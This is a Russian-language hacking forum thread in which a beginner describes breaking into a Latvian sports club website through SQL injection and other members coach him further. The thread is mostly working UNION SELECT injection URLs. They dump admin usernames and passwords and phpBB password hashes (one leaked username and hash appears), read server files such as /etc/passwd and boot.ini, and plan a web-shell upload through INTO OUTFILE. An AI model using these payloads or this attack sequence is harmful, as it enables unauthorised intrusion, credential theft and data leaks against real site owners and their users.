Доброе время суток. Значит так , дело было вечером и делать естественно было нечего. И после просмотра очередного видео о SQL inj и заливе шела я решил попробывать это сам. Первое что я сделал нашол жертву своих коварных замыслов: После того как жертва была найдена я проверил саит на наличие скуля: http://www.site.lv/?p=news&off=&id=10`4 Ура скуль найден. Далие нахожу количество полей... http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,3,4,5,6/* Потом смотрю название и версию БД.... http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,version(),4,5,6/* http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,database(),4,5,6/* Получил версию : 5.0.21-community-nt и название ДБ : xxx Теперь было бы неплохо найти узеров + их пароли к адм панели саита... http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,user,4,5,6+from+users/* http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,pass,4,5,6+from+users/* И тут опять же удача мне улыбнулась и после этих 2 запросов я получил 3 узернаме и пароли к ним. Зайдя в адм панель ничего интересного я там ненашол кроме ДОБАВИТЙ ИЗМЕНИТЙ УДАЛИТЙ новости.... это меня огарчило и на некоторе время загнало в тупик , так как незнал што делатй дальше.. Немного подумав решил наити таблици в ДБ и составил такои запрос: http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,table_name,4,5,6+from+information_schema.tables/* После этого запроса получил название всех таблиц: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS phpbb_auth_access phpbb_banlist phpbb_categories phpbb_config phpbb_confirm phpbb_disallow phpbb_forum_prune phpbb_forums phpbb_groups phpbb_posts phpbb_posts_text phpbb_privmsgs phpbb_privmsgs_text phpbb_ranks phpbb_search_results phpbb_search_wordlist phpbb_search_wordmatch phpbb_sessions phpbb_smilies phpbb_themes phpbb_themes_name phpbb_topics phpbb_topics_watch phpbb_user_group phpbb_users phpbb_vote_desc phpbb_vote_results phpbb_vote_voters phpbb_words countries countries_ matches matches2005 matches2006 matches2007 news players players_ positions teams teams_ users visit И на этом я остановился ,так как незнаю что необходимо сделать дальше для того что би залить шелл... Может ктонибудь мог бы мне немного подсказать .... P.S Hе судите меня строго , я весго лиш новичок...
ну так залезай в phpbb_users доставай хеши админов - бруть их - залезай в админку - и сливай базу ...
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,concat(username,0x3a,user_password),4,5,6+from+phpbb_users/*
Code: http://www.site.lv/?p=news&off=&id=-1045+UNION+SELECT+1,2,concat_ws(0x3a,username,user_password,user_email,user_icq),4,5,6+from+fkvbb.phpbb_users/* =\
Сделав такой запрос получил такой erorr: Table 'fkventspils.phpbb_users' doesn't exist А почему fkventspils.phpbb_users если в моём запросе phpbb_users? Форум находится http://www.site.lv/forum/ Может это как то влияет ?
Автоматически подставляется текущая бд, а именно fkventspils. А бд форума называется по другому. Code: http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,table_schema,4,5,6+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+0,1/* Вот и узнали, что данные форума лежат у нас в fkvbb. Составляем запрос: Code: http://www.fkve****.lv/?p=news&off=&id=-104+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6+from+fkvbb.phpbb_users+limit+1,1/* Andruxa:7fee56ff9519fdc6c473dee675c4b003 и т.д. лимитом. (;
http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/* попробуй так
Если есть привилегии file_priv, то мона залить шелл скулем через INTO OUTFILE. А коль есть ПхпББ, то через него конечно удобнее. Как? А вот так: /showpost.php?p=198446&postcount=3
короче если прокатит http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('C:/boot.ini'),4,5,6/* либо http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file('/etc/passwd'),4,5,6/* То file_priv есть, иначе его нет
тогда уж http://www.site.lv/?p=news&off=&id=-104+union+select+1,2,load_file(0x433A2F626F6F742E696E69),4,5,6/* так надежней, к тому же как я понял серв виндовый: